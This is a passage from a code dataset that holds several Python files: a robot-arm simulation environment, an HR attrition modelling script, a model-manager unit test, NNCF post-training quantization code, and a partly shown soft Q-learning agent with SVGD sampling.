self.moveto(self.config1,self.config2)\n vrep.simxPauseCommunication(self.clientID, False)\n self.lastCmdTime = self.currCmdTime\n vrep.simxSynchronousTrigger(self.clientID)\n vrep.simxGetPingTime(self.clientID)\n s = self.getState_v1()\n return s\n\n def step(self,action):\n action = np.clip(action, *self.action_bound)\n self.jointConfig1 = np.zeros((self.jointNum,))\n self.jointConfig2 = np.zeros((self.jointNum,))\n for i in range(self.jointNum):\n _, jpos = vrep.simxGetJointPosition(self.clientID, self.robot1_jointHandle[i],vrep.simx_opmode_buffer)\n self.jointConfig1[i] = jpos\n for i in range(self.jointNum):\n _, jpos = vrep.simxGetJointPosition(self.clientID, self.robot2_jointHandle[i],vrep.simx_opmode_buffer)\n self.jointConfig2[i] = jpos\n # print(self.jointConfig1)\n self.jointConfig1 += action[:3]*self.dt\n self.jointConfig2 += action[-3:]*self.dt\n # self.jointConfig1 %= np.pi*2\n # self.jointConfig2 %= np.pi*2\n self.jointConfig1=np.clip(self.jointConfig1,*self.joint_bound)\n self.jointConfig2 = 
np.clip(self.jointConfig2, *self.joint_bound)\n        self.moveto(self.jointConfig1,self.jointConfig2)\n        time.sleep(0.01)\n        s_ = self.getState_v1()\n\n        r = self._r_func()\n        return s_,r,self.get_point,self.get_obstacles\n\n    def getState(self):  # state definition, version 1: dimension 18\n        # output type : list\n        _, pos1 = vrep.simxGetObjectPosition(self.clientID,self.end1_Handle,-1, vrep.simx_opmode_buffer)\n        _, pos2 = vrep.simxGetObjectPosition(self.clientID, self.end2_Handle,-1,vrep.simx_opmode_buffer)\n        del pos1[2]\n        del pos2[2]\n        pos1 = np.array(pos1)\n        pos2 = np.array(pos2)\n        s = np.hstack((pos1,pos2))\n        robot1_link_pos = np.zeros((self.jointNum,2),dtype=float)\n        robot2_link_pos = np.zeros((self.jointNum, 2), dtype=float)\n        for i in range(self.jointNum):\n            _,returnpos = vrep.simxGetObjectPosition(self.clientID,self.robot1_linkHandle[i],-1, vrep.simx_opmode_buffer)\n            del returnpos[2]\n            returnpos = np.array(returnpos)\n            robot1_link_pos[i,:] = returnpos-pos1\n        for i in range(self.jointNum):\n            _,returnpos = vrep.simxGetObjectPosition(self.clientID,self.robot2_linkHandle[i],-1,vrep.simx_opmode_buffer)\n            del returnpos[2]\n            returnpos = np.array(returnpos)-pos2\n            robot2_link_pos[i,:] = returnpos\n        robot1_link_pos = np.reshape(robot1_link_pos,newshape=(-1,))\n        robot2_link_pos = np.reshape(robot2_link_pos, newshape=(-1,))\n        s = np.hstack((s,np.hstack((robot1_link_pos,robot2_link_pos))))\n        collision1,collision2=self.getCollisonStates()\n        danger = np.array([1. if collision1 else 0. ,1. if collision2 else 0.])\n        s = np.hstack((s,danger))\n\n        return s\n    def getState_v1(self):  # state definition, version 2: dimension 14\n        jointConfig1 = np.zeros((self.jointNum,))\n        jointConfig2 = np.zeros((self.jointNum,))\n        for i in range(self.jointNum):\n            _, jpos = vrep.simxGetJointPosition(self.clientID, self.robot1_jointHandle[i], vrep.simx_opmode_buffer)\n            jointConfig1[i] = jpos\n        for i in range(self.jointNum):\n            _, jpos = vrep.simxGetJointPosition(self.clientID, self.robot2_jointHandle[i], vrep.simx_opmode_buffer)\n            jointConfig2[i] = jpos\n        s = np.hstack((jointConfig1, jointConfig2))\n        _, pos1 = vrep.simxGetObjectPosition(self.clientID, self.end1_Handle, -1, vrep.simx_opmode_buffer)\n        _, pos2 = vrep.simxGetObjectPosition(self.clientID, self.end2_Handle, -1, vrep.simx_opmode_buffer)\n        del pos1[2]\n        del pos2[2]\n        pos1 = np.array(pos1)\n        pos2 = np.array(pos2)\n        pos = np.hstack((pos1, pos2))\n        s = np.hstack((s,pos))\n\n        _, d1 = vrep.simxReadDistance(self.clientID, self.robot1_goal_Handle, vrep.simx_opmode_buffer)\n        _, d2 = vrep.simxReadDistance(self.clientID, self.robot2_goal_Handle, vrep.simx_opmode_buffer)\n        s = np.hstack((s, np.array([d1,d2])))\n        # collision1, collision2 = self.getCollisonStates()\n        # danger = np.array([1. if collision1 else 0., 1. if collision2 else 0.])\n        # s = np.hstack((s, danger))\n        return s\n    def sample_action(self):\n        return np.random.uniform(*self.action_bound, size=self.jointNum*2)\n
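    # Reward shaping, as implemented below: a per-step penalty equal to the\n    # summed end-effector-to-goal distances, +50 per step while that sum is\n    # within 0.1 (plus a one-off +100, setting get_point, once it has been held\n    # for t consecutive steps), and a one-time -300 penalty per arm in collision.\n    def _r_func(self):\n        t=20\n        collision1, collision2 = self.getCollisonStates()\n        collision = np.array([1. if collision1 else 0., 1. if collision2 else 0.])\n        _,d1 = vrep.simxReadDistance(self.clientID,self.robot1_goal_Handle, vrep.simx_opmode_buffer)\n        _,d2 = vrep.simxReadDistance(self.clientID,self.robot2_goal_Handle, vrep.simx_opmode_buffer)\n        d = d1+d2\n\n        r = -d\n        if d<=0.1 and not self.get_point:\n            r+=50.\n            self.grab_counter+=1\n            if self.grab_counter>t:\n                r+=100\n                self.get_point =True\n        elif d>0.1:\n            self.grab_counter=0\n            self.get_point =False\n\n        if (collision[0]==1. or collision[1]==1.) 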
and (not self.get_obstacles):\n r=-300*collision[0]-300*collision[1]+r\n self.obstacles_counter+=1\n self.get_obstacles=True\n return r\n\nif __name__ == '__main__':\n env = VREP_server()\n\n # for i in range(1000):\n # a = env.sample_action()\n # s,_,_,danger= env.step(a)\n #\n # print(s[-2:])\n","sub_path":"new_env.py","file_name":"new_env.py","file_ext":"py","file_size_in_byte":13234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"14235674","text":"# -*- coding: utf-8 -*-\nimport pandas as pd\nimport numpy as np\n\nmanager_survey = pd.read_csv('C:/htoc/biof309/final-project/data/hr-analytics-case-study/manager_survey_data.csv')\nemployee_survey = pd.read_csv('C:/htoc/biof309/final-project/data/hr-analytics-case-study/employee_survey_data.csv')\ngeneral_data = pd.read_csv('C:/htoc/biof309/final-project/data/hr-analytics-case-study/general_data.csv')\n\npd.set_option('display.max_columns', None)\n\n#print(employee_survey.shape)\n#print(employee_survey.head())\n#print(manager_survey.shape)\n#print(manager_survey.head())\n#print(general_data.shape)\n#print(general_data.head())\n\nattrition_data = pd.merge(general_data,pd.merge(manager_survey,employee_survey,on='EmployeeID',how='inner'),on='EmployeeID',how='inner')\n\nattrition_data.columns = attrition_data.columns.str.lower()\n\n(dim1,dim2) = attrition_data.shape\n\nfor i in range(dim2) :\n print(attrition_data.columns[i],'\\t',round(attrition_data.iloc[ :,i].count()/dim1,2))\n\nattrition_data = attrition_data.dropna()\n(dim1,dim2) = attrition_data.shape\n\n\n#from sklearn.linear_model import LogisticRegression\n#from sklearn.metrics import classification_report, confusion_matrix\npd.crosstab(attrition_data['attrition'],columns=\"count\",colnames=[''])\n\nattrition_data['attrition'] = np.where(attrition_data['attrition']==\"Yes\",1,0) # reset attrition as a 0-1 variable\n\npd.crosstab(attrition_data['attrition'],columns=\"count\",colnames=[''])\n\n\nnumvars = ['age', 'monthlyincome', 'numcompaniesworked', 'percentsalaryhike', 'totalworkingyears', 'yearsatcompany', 'yearssincelastpromotion', 'yearswithcurrmanager'] \n\n\nfacvars=['businesstravel','department','education','educationfield','gender','joblevel','jobrole','maritalstatus','stockoptionlevel','jobinvolvement','performancerating','environmentsatisfaction','jobsatisfaction', 'worklifebalance']\nprint(facvars)\n\nprint(numvars)\n\n\npd.crosstab(attrition_data['businesstravel'],columns=\"count\",colnames=[''])\nattrition_data['travelalot'] = np.where(attrition_data['businesstravel']==\"Travel_Frequently\",1,0)\npd.crosstab(attrition_data['travelalot'],columns=\"count\",colnames=[''])\n\npd.crosstab(attrition_data['department'],columns=\"count\",colnames=[''])\nattrition_data['randddepartment'] = np.where(attrition_data['department']==\"Research & Development\",1,0)\npd.crosstab(attrition_data['randddepartment'],columns=\"count\",colnames=[''])\n\npd.crosstab(attrition_data['educationfield'],columns=\"count\",colnames=[''])\nattrition_data['sciencemedicaleduc'] = np.where(attrition_data['educationfield'].isin(['Life Sciences','Medical']),1,0)\npd.crosstab(attrition_data['sciencemedicaleduc'],columns=\"count\",colnames=[''])\n\npd.crosstab(attrition_data['gender'],columns=\"count\",colnames=[''])\nattrition_data['male'] = 
np.where(attrition_data['gender']==\"Male\",1,0)\npd.crosstab(attrition_data['male'],columns=\"count\",colnames=[''])\n\npd.crosstab(attrition_data['jobrole'],columns=\"count\",colnames=[''])\nattrition_data['researchjob'] = np.where(attrition_data['jobrole'].isin(['Research Director','Research Scientist']),1,0)\npd.crosstab(attrition_data['researchjob'],columns=\"count\",colnames=[''])\n\npd.crosstab(attrition_data['maritalstatus'],columns=\"count\",colnames=[''])\nattrition_data['evermarried'] = np.where(attrition_data['maritalstatus']==\"Single\",0,1)\npd.crosstab(attrition_data['evermarried'],columns=\"count\",colnames=[''])\n\npd.crosstab(attrition_data['environmentsatisfaction'],columns=\"count\",colnames=[''])\nattrition_data['highworkenvironment'] = np.where(attrition_data['environmentsatisfaction']>2,1,0)\npd.crosstab(attrition_data['highworkenvironment'],columns=\"count\",colnames=[''])\n\npd.crosstab(attrition_data['jobsatisfaction'],columns=\"count\",colnames=[''])\nattrition_data['highjobsatisfaction'] = np.where(attrition_data['jobsatisfaction']>2,1,0)\npd.crosstab(attrition_data['highjobsatisfaction'],columns=\"count\",colnames=[''])\n\npd.crosstab(attrition_data['worklifebalance'],columns=\"count\",colnames=[''])\nattrition_data['highworklifebalance'] = np.where(attrition_data['worklifebalance']>2,1,0)\npd.crosstab(attrition_data['highworklifebalance'],columns=\"count\",colnames=[''])\n\n\npd.crosstab(attrition_data['male'],columns=\"count\",colnames=[''])\nattrition_data['male'] = np.where(attrition_data['gender']==\"Male\",1,0)\npd.crosstab(attrition_data['male'],columns=\"count\",colnames=[''])\n\n\n\nnewfacvars = (\n['travelalot','researchjob','evermarried','highworkenvironment','highjobsatisfaction','highworklifebalance']\n)\n\njobs = attrition_data[['attrition']+numvars+newfacvars]\n\nfrom sklearn.model_selection import train_test_split\nX = jobs[numvars+newfacvars] # Features\ny = jobs.attrition # Target variable\nX_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.25,random_state=0)\n\n\ntrain = X_train\ntrain = train.assign(attrition=list(y_train))\nprint(\"\\nTraining data head\")\nprint(train.head())\nprint(train.shape)\n \nimport matplotlib.pyplot as plt\nfrom statsmodels.formula.api import logit\nimport statsmodels.api as sm\n\n# show categorical variables\n#for var in facvars: \n# print('\\n \\n Univariate analysis of '+var)\n# train[var].hist() \n# plt.show()\n# form1 = 'attrition ~ C('+var+')' \n# fit = logit(form1,data=train).fit()\n# print(fit.summary())\n\n# show continuous variables\n \nfor var in numvars: \n print('\\n \\n Univariate analysis of '+var)\n print(train[var].describe()) \n form1 = 'attrition ~ '+var \n fit = logit(form1,data=train).fit()\n print(fit.summary())\n\n\nfor var in newfacvars: \n print('\\n \\n Univariate analysis of '+var)\n print(train[var].describe()) \n form1 = 'attrition ~ '+var \n fit = logit(form1,data=train).fit()\n print(fit.summary())\n\n\n\n#variables to keep for Lasso approach - those with p-value < .10\n \n \n# recode categorical variables into 0-1 categories\n# business travel\n\n\n \n#numvars2 = ['age']\n#\n#newfacvars2 = [\n# 'highjobsatisfaction']\n\nfrom sklearn.linear_model import LogisticRegressionCV, LogisticRegression\n\nfrom sklearn.metrics import classification_report, confusion_matrix\n\nX_tr = train[numvars+newfacvars]\ny_tr = y_train\nXstan_tr = ((X_tr-X_tr.mean())/X_tr.std())\n\n\nclf = 
LogisticRegressionCV(Cs=30,cv=20,random_state=0,penalty='l1',solver='liblinear').fit(Xstan_tr,y_tr)\nclf.coef_\nclf.C_\npredprobs = pd.DataFrame(clf.predict_proba(Xstan_tr)).iloc[:,1]\n\npredprobs.describe()\n\npd.crosstab(y_tr,columns=\"count\")/y_tr.count()\ncutpoint = predprobs.quantile(1-.16062)\n#zeroone = np.where(predprobs > predprobs.quantile(1-.16062),1,0)\n#pd.DataFrame(zeroone).describe()\n\n\n#\n#y_pred = clf.predict(Xstan_tr)\n#conf_m = confusion_matrix(y_tr,y_pred)\n#print(conf_m)\n#\n#confusion_matrix(y_tr,y_pred)\n#confusion_matrix(y_tr,zeroone)\n\n\ntest = X_test\ntest = test.assign(attrition=list(y_test))\nprint(\"\\nTesting data head\")\nprint(test.shape)\n\nX_te = test[numvars+newfacvars]\ny_te = y_test\nXstan_te = ((X_te-X_te.mean())/X_te.std())\n\n\n#clf = LogisticRegressionCV(Cs=30,cv=20,random_state=0,penalty='l1',solver='liblinear').fit(Xstan_te,y_te)\n#clf.coef_\n#clf.C_\npd.DataFrame(clf.predict_proba(Xstan_te)).iloc[:,1].describe()\n\n#predprobs = pd.DataFrame(clf.predict_proba(Xstan_te)).iloc[:,1]\npd.crosstab(y_te,columns=\"count\")/y_te.count()\ncutpoint = predprobs.quantile(1-.16)\nzeroone = np.where(predprobs > cutpoint,1,0)\npd.DataFrame(zeroone).describe()\n\n\n\ny_pred = clf.predict(Xstan_te)\nconf_m = confusion_matrix(y_te,y_pred)\nprint(conf_m)\n\nconfusion_matrix(y_te,y_pred)\nconfusion_matrix(y_te,zeroone)\n\n\n\n#clf = LogisticRegression(solver='lbfgs',penalty='none').fit(X,y)\n\n\nX = jobs[numvars+newfacvars]\ny = jobs.attrition \nXstan = ((X-X.mean())/X.std())\n\nXstan2 = sm.add_constant(Xstan_tr)\n\nmodel = sm.Logit(y_tr, Xstan2)\nresult = model.fit_regularized(method='l1',alpha=clf.C_)\nresult.summary()\n#\n#Xstan['y'] = y\n#Xstan.to_csv('c:\\\\htoc\\\\biof309\\\\final-project\\\\data\\\\Xstan.csv')\n#\n\nfrom sklearn.ensemble import RandomForestClassifier\n\nclf = RandomForestClassifier(n_estimators=50).fit(X_tr,y_tr)\ny_pred_tr = clf.predict(X_tr)\nconfusion_matrix(y_tr,y_pred_tr)\n\ny_pred2 = clf.predict(X_te)\nconfusion_matrix(y_te,y_pred2)\n\nprint('Variable importance for Random Forest \\n')\npd.DataFrame(clf.feature_importances_,columns = ['Importance'],index=X_te.columns).sort_values(by=['Importance'],ascending=False)\n","sub_path":"hr-script.py","file_name":"hr-script.py","file_ext":"py","file_size_in_byte":8242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"2509256","text":"\"\"\"Test model functionality.\"\"\"\n\nimport unittest\nfrom colepy.utils import model_loader, model_saver, model_remover\nimport os\nfrom sklearn.linear_model import LinearRegression\n\n\nclass ManagerTest(unittest.TestCase):\n\n    def test_model_manager(self):\n        model = LinearRegression()\n        self.assertFalse(os.path.exists('./local/models/linear'))\n        model_saver(model_name='linear', model=model)\n        self.assertTrue(os.path.exists('./local/models/linear'))\n        model_saver(model_name='linear', model=model)\n\n        model_dict = model_loader(model_name='linear')\n        self.assertEqual(2, len(model_dict))\n        model_remover(model_name='linear', keeps=1)\n        model_dict = model_loader(model_name='linear')\n        self.assertEqual(1, len(model_dict))\n        model_remover(model_name='linear', keeps=0)\n        self.assertFalse(os.path.exists('./local/models/linear'))\n","sub_path":"tests/manager_test.py","file_name":"manager_test.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"226261485","text":"# Copyright (c) 2023 Intel Corporation\n# Licensed under the 
Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom dataclasses import dataclass\nfrom typing import Callable, Dict, List, Optional, TypeVar\n\nfrom nncf import Dataset\nfrom nncf.common.deprecation import warning_deprecated\nfrom nncf.common.factory import NNCFGraphFactory\nfrom nncf.common.factory import StatisticsAggregatorFactory\nfrom nncf.common.graph.graph import NNCFGraph\nfrom nncf.common.logging import nncf_logger\nfrom nncf.common.quantization.structs import QuantizationPreset\nfrom nncf.common.tensor_statistics.statistic_point import StatisticPointsContainer\nfrom nncf.common.utils.backend import BackendType\nfrom nncf.common.utils.backend import copy_model\nfrom nncf.common.utils.backend import get_backend\nfrom nncf.parameters import ModelType\nfrom nncf.parameters import TargetDevice\nfrom nncf.quantization.advanced_parameters import AdvancedQuantizationParameters\nfrom nncf.quantization.algorithms.algorithm import Algorithm\nfrom nncf.quantization.algorithms.bias_correction.algorithm import BIAS_CORRECTION_THRESHOLD\nfrom nncf.quantization.algorithms.bias_correction.algorithm import BiasCorrection\nfrom nncf.quantization.algorithms.channel_alignment.algorithm import ChannelAlignment\nfrom nncf.quantization.algorithms.fast_bias_correction.algorithm import FAST_BIAS_CORRECTION_THRESHOLD\nfrom nncf.quantization.algorithms.fast_bias_correction.algorithm import FastBiasCorrection\nfrom nncf.quantization.algorithms.min_max.algorithm import MinMaxQuantization\nfrom nncf.quantization.algorithms.smooth_quant.algorithm import SmoothQuant\nfrom nncf.quantization.passes import insert_null_biases_pass\nfrom nncf.scopes import IgnoredScope\n\nTModel = TypeVar(\"TModel\")\nTPass = Callable[[TModel], TModel]\n\n\nclass PostTrainingQuantization(Algorithm):\n \"\"\"\n Implements Post-Training Quantization algorithm, which basically includes:\n 1) ChannelAlignment\n 2) MinMaxQuantization\n 3) FastBiasCorrection or BiasCorrection\n \"\"\"\n\n @dataclass\n class FirstStageAlgorithm:\n algorithm: \"Algorithm\"\n pre_passes: List[TPass]\n\n def __init__(\n self,\n preset: QuantizationPreset = QuantizationPreset.PERFORMANCE,\n target_device: TargetDevice = TargetDevice.ANY,\n subset_size: int = 300,\n fast_bias_correction: bool = True,\n model_type: Optional[ModelType] = None,\n ignored_scope: Optional[IgnoredScope] = None,\n advanced_parameters: Optional[AdvancedQuantizationParameters] = None,\n ):\n \"\"\"\n :param preset: A preset that controls the quantization mode\n (symmetric and asymmetric). 
It can take the following values:\n - `performance`: Symmetric quantization of weights and activations.\n - `mixed`: Symmetric quantization of weights and asymmetric\n quantization of activations.\n :param target_device: A target device the specificity of which will be taken\n into account while compressing in order to obtain the best performance\n for this type of device.\n :param subset_size: Size of a subset to calculate activations\n statistics used for quantization.\n :param fast_bias_correction: Setting this option to `False` enables a different\n bias correction method which is more accurate, in general, and takes\n more time but requires less memory.\n :param model_type: Model type is needed to specify additional patterns\n in the model. Supported only `transformer` now.\n :param ignored_scope: An ignored scope that defined the list of model control\n flow graph nodes to be ignored during quantization.\n :param advanced_parameters: Advanced quantization parameters for\n fine-tuning the quantization algorithm\n \"\"\"\n super().__init__()\n self.algorithms = []\n self.first_stage_algorithms: List[self.FirstStageAlgorithm] = []\n\n if target_device is TargetDevice.VPU:\n warning_deprecated(\"VPU device is deprecated and will no longer be supported in the future.\")\n\n if advanced_parameters is None:\n advanced_parameters = AdvancedQuantizationParameters()\n\n if model_type == ModelType.TRANSFORMER:\n smooth_quant_algorithm = SmoothQuant(\n subset_size=subset_size,\n inplace_statistics=advanced_parameters.inplace_statistics,\n alpha=advanced_parameters.smooth_quant_alpha,\n )\n self.first_stage_algorithms.append(self.FirstStageAlgorithm(smooth_quant_algorithm, []))\n\n if not advanced_parameters.disable_channel_alignment:\n channel_alignment = ChannelAlignment(\n subset_size=subset_size,\n inplace_statistics=advanced_parameters.inplace_statistics,\n backend_params=advanced_parameters.backend_params,\n )\n self.first_stage_algorithms.append(self.FirstStageAlgorithm(channel_alignment, [insert_null_biases_pass]))\n\n min_max_quantization = MinMaxQuantization(\n preset=preset,\n target_device=target_device,\n subset_size=subset_size,\n model_type=model_type,\n ignored_scope=ignored_scope,\n overflow_fix=advanced_parameters.overflow_fix,\n quantize_outputs=advanced_parameters.quantize_outputs,\n inplace_statistics=advanced_parameters.inplace_statistics,\n activations_quantization_params=advanced_parameters.activations_quantization_params,\n weights_quantization_params=advanced_parameters.weights_quantization_params,\n activations_range_estimator_params=advanced_parameters.activations_range_estimator_params,\n weights_range_estimator_params=advanced_parameters.weights_range_estimator_params,\n backend_params=advanced_parameters.backend_params,\n )\n\n self.algorithms.append(min_max_quantization)\n\n if advanced_parameters.disable_bias_correction:\n return\n\n bias_correction_params = advanced_parameters.bias_correction_params\n if fast_bias_correction:\n threshold = FAST_BIAS_CORRECTION_THRESHOLD\n if bias_correction_params.threshold is not None:\n threshold = bias_correction_params.threshold\n bias_correction = FastBiasCorrection(\n subset_size=subset_size,\n threshold=threshold,\n apply_for_all_nodes=bias_correction_params.apply_for_all_nodes,\n inplace_statistics=advanced_parameters.inplace_statistics,\n backend_params=advanced_parameters.backend_params,\n )\n else:\n threshold = BIAS_CORRECTION_THRESHOLD\n if bias_correction_params.threshold is not None:\n threshold = 
bias_correction_params.threshold\n bias_correction_subset_size = max(int(subset_size * 0.2), 1)\n bias_correction = BiasCorrection(\n subset_size=bias_correction_subset_size,\n threshold=threshold,\n apply_for_all_nodes=bias_correction_params.apply_for_all_nodes,\n inplace_statistics=advanced_parameters.inplace_statistics,\n backend_params=advanced_parameters.backend_params,\n )\n\n self.algorithms.append(bias_correction)\n\n @property\n def available_backends(self) -> Dict[str, BackendType]:\n return\n\n def get_statistic_points(self, model: TModel, graph: NNCFGraph) -> StatisticPointsContainer:\n if self.first_stage_algorithms:\n raise NotImplementedError(\n \"Statistic points are not supported yet for SmoothQuant and ChannelAlignment algorithms.\"\n )\n\n output = StatisticPointsContainer()\n for algorithm in self.algorithms:\n for statistic_points in algorithm.get_statistic_points(model, graph).values():\n for statistic_point in statistic_points:\n output.add_statistic_point(statistic_point)\n return output\n\n def apply(\n self,\n model: TModel,\n graph: NNCFGraph,\n statistic_points: Optional[StatisticPointsContainer] = None,\n dataset: Optional[Dataset] = None,\n ) -> TModel:\n modified_model = copy_model(model)\n modified_model_graph = graph\n backend = get_backend(modified_model)\n\n for first_stage_algorithm in self.first_stage_algorithms:\n algorithm = first_stage_algorithm.algorithm\n\n if isinstance(algorithm, SmoothQuant) and backend != BackendType.OPENVINO:\n nncf_logger.debug(f\"{backend.name} does not support SmoothQuant algorithm yet.\")\n continue\n\n if isinstance(algorithm, ChannelAlignment) and backend != BackendType.OPENVINO:\n nncf_logger.debug(f\"{backend.name} does not support ChannelAlignment algorithm yet.\")\n continue\n\n for pre_pass in first_stage_algorithm.pre_passes:\n modified_model = pre_pass(modified_model, modified_model_graph)\n modified_model_graph = NNCFGraphFactory.create(modified_model)\n\n statistics_aggregator = StatisticsAggregatorFactory.create(modified_model, dataset)\n algo_statistic_points = algorithm.get_statistic_points(modified_model, modified_model_graph)\n statistics_aggregator.register_statistic_points(algo_statistic_points)\n statistics_aggregator.collect_statistics(modified_model, modified_model_graph)\n modified_model = algorithm.apply(\n modified_model, modified_model_graph, statistics_aggregator.statistic_points\n )\n modified_model_graph = NNCFGraphFactory.create(modified_model)\n\n if statistic_points is None:\n statistics_aggregator = StatisticsAggregatorFactory.create(modified_model, dataset)\n for algorithm in self.algorithms:\n algo_statistic_points = algorithm.get_statistic_points(modified_model, modified_model_graph)\n statistics_aggregator.register_statistic_points(algo_statistic_points)\n\n statistics_aggregator.collect_statistics(modified_model, modified_model_graph)\n statistic_points = statistics_aggregator.statistic_points\n\n for algorithm in self.algorithms[:-1]:\n modified_model = algorithm.apply(modified_model, modified_model_graph, statistic_points)\n modified_model_graph = NNCFGraphFactory.create(modified_model)\n # building the model graph is not required after the last algorithm\n modified_model = self.algorithms[-1].apply(modified_model, modified_model_graph, statistic_points)\n\n return 
modified_model\n","sub_path":"nncf/quantization/algorithms/post_training/algorithm.py","file_name":"algorithm.py","file_ext":"py","file_size_in_byte":11275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"34558175","text":"import os\nimport torch as T\nimport torch.nn.functional as F\nimport numpy as np\nfrom buffer import ReplayBuffer\n#from networks import ActionValueNetwork, SamplerNetwork\nfrom torch.distributions.uniform import Uniform\nfrom torch.distributions.normal import Normal\nfrom networks import SamplingNetwork, MLPQFunction\nimport torch.optim as optim\nimport time\nfrom copy import deepcopy\n\n\nfrom multigoal import MultiGoalEnv\n\n\n\n\n\nclass Agent():\n def __init__(self, env_fn, hidden_dim, \n replay_size, gamma, pi_lr, q_lr, batch_size, n_particles):\n\n self.env= MultiGoalEnv()\n \n self.gamma = gamma\n self.n_particles = n_particles\n self.batch_size = batch_size\n\n \n \n self.env, self.test_env = self.env, self.env\n self.obs_dim = self.env.observation_space.shape\n \n self.action_dim = self.env.action_space.shape[0]\n self.action_bound = self.env.action_space.high[0]\n \n # Action limit for clamping: critically, assumes all dimensions share the same bound!\n \n # Create actor-critic module and target networks\n self.Q_Network = MLPQFunction(self.env.observation_space, self.env.action_space, hidden_dim)\n #self.ac_targ = deepcopy(self.ac)\n \n self.SVGD_Network = SamplingNetwork(batch_size = self.batch_size, n_particles = self.n_particles,\n observation_space= self.env.observation_space, action_space = self.env.action_space)\n # # Freeze target networks with respect to optimizers (only update via polyak averaging)\n # for p in self.ac_targ.parameters():\n # p.requires_grad = False\n \n # Set up optimizers for policy and q-function\n self.q_optimizer = optim.Adam(self.Q_Network.parameters(), lr=q_lr)\n self.sampler_optimizer = optim.Adam(self.SVGD_Network.parameters(), lr=pi_lr)\n \n \n # Experience buffer\n self.replay_buffer = ReplayBuffer(obs_dim=self.obs_dim, act_dim=self.action_dim, size=replay_size)\n\n def rbf_kernel(self, input_1, input_2, h_min=1e-3):\n k_fix, out_dim1 = input_1.size()[-2:]\n k_upd, out_dim2 = input_2.size()[-2:]\n assert out_dim1 == out_dim2\n \n # Compute the pairwise distances of left and right particles.\n diff = input_1.unsqueeze(-2) - input_2.unsqueeze(-3)\n # N * k_fix * 1 * out_dim / N * 1 * k_upd * out_dim/ N * k_fix * k_upd * out_dim\n dist_sq = diff.pow(2).sum(-1)\n # N * k_fix * k_upd\n dist_sq = dist_sq.unsqueeze(-1)\n # N * k_fix * k_upd * 1\n \n # Get median.\n median_sq = T.median(dist_sq, dim=1)[0]\n median_sq = median_sq.unsqueeze(1)\n # N * 1 * k_upd * 1\n \n h = median_sq / np.log(k_fix + 1.) + .001\n # N * 1 * k_upd * 1\n \n kappa = T.exp(-dist_sq / h)\n # N * k_fix * k_upd * 1\n \n # Construct the gradient\n kappa_grad = -2. 
* diff / h * kappa\n return kappa, kappa_grad\n \n \n \n def compute_millowmax_target(self, Q_values):\n # beta = 1\n # mm_weights = []\n \n # max_Q = T.max(Q_values, dim=1)[0]\n \n mm_target = T.logsumexp(Q_values, dim=1) + T.log(T.tensor(1/self.n_particles))\n \n # denominator = T.sum(T.exp(beta * Q_values - max_Q.unsqueeze(-1)), dim=1)\n \n # for i in range(self.n_particles):\n # current_Q = Q_values[:, i]\n # current_Q_exp = T.exp(beta * current_Q - max_Q)\n # mm_weights.append(list((current_Q_exp / denominator).detach().numpy()))\n \n # mm_weights = T.tensor(np.array(mm_weights, dtype=np.double)).view(-1, self.n_particles)\n \n # mm_target = T.sum(Q_values * mm_weights, dim=1)\n \n return mm_target\n \n \n # Set up function for computing DDPG Q-loss\n def compute_loss_q(self, data):\n o, a, r, o2, d = data['obs'], data['act'], data['rew'], data['obs2'], data['done']\n \n aplus = T.from_numpy(self.SVGD_Network.act(o2,n_particles=self.n_particles))\n #print(\"aplus=\",aplus.shape)\n \n q = self.Q_Network(o,a)\n \n \n # Bellman backup for Q function\n with T.no_grad():\n Q_soft_ = self.Q_Network(o2, aplus,n_sample=self.n_particles)\n V_soft_ = T.logsumexp(Q_soft_, dim=1)\n V_soft_ += self.action_dim * T.log(T.tensor([2.]))\n #mm_target = self.compute_millowmax_target(Q_soft_)\n #print(mm_target)\n #backup = r + self.gamma * (1 - d) * mm_target\n backup = r + self.gamma * (1 - d) * V_soft_\n \n # MSE loss against Bellman backup\n loss_q = ((q - backup)**2).mean()\n \n # Useful info for logging\n loss_info = dict(QVals=q.detach().numpy())\n \n # print(f'loss_q: {loss_q}')\n # print(f'q_pi_targ: {q_pi_targ}')\n # print(f'q1: {q}')\n \n return loss_q, loss_info\n \n \n \n def update_svgd_ss(self, data):\n \n o = data['obs']\n actions = self.SVGD_Network(o,n_particles=self.n_particles)\n assert actions.shape == (self.batch_size,self.n_particles, self.action_dim)\n \n fixed_actions = self.SVGD_Network.act(o,n_particles=self.n_particles)\n fixed_actions = T.from_numpy(fixed_actions)\n fixed_actions.requires_grad = True\n svgd_target_values = self.Q_Network(o, fixed_actions,n_sample = self.n_particles)\n \n # squash_correction = T.sum(T.log(1 - fixed_actions**2 + 1e-6), dim=-1)\n # svgd_target_values = T.add(svgd_target_values, squash_correction)\n \n \n # Target log-density. 
Q_soft in Equation 13:\n \n log_p = svgd_target_values\n \n \n grad_log_p = T.autograd.grad(log_p.sum(), fixed_actions)[0]\n grad_log_p = grad_log_p.view(self.batch_size,self.n_particles, self.action_dim).unsqueeze(2)\n grad_log_p = grad_log_p.detach()\n assert grad_log_p.shape == (self.batch_size, self.n_particles, 1, self.action_dim)\n \n kappa, gradient = self.rbf_kernel(input_1=fixed_actions, input_2=actions)\n \n # Kernel function in Equation 13:\n # kappa = kappa.unsqueeze(dim=3)\n assert kappa.shape == (self.batch_size, self.n_particles, self.n_particles, 1)\n \n \n anneal = 1.\n action_gradients = (1/self.n_particles)*T.sum(anneal*kappa * grad_log_p + gradient, dim=1)\n assert action_gradients.shape == (self.batch_size, self.n_particles, self.action_dim)\n \n # Propagate the gradient through the policy network (Equation 14).\n self.sampler_optimizer.zero_grad()\n T.autograd.backward(-actions,grad_tensors=action_gradients)\n self.sampler_optimizer.step()\n \n def learn(self, data):\n \n 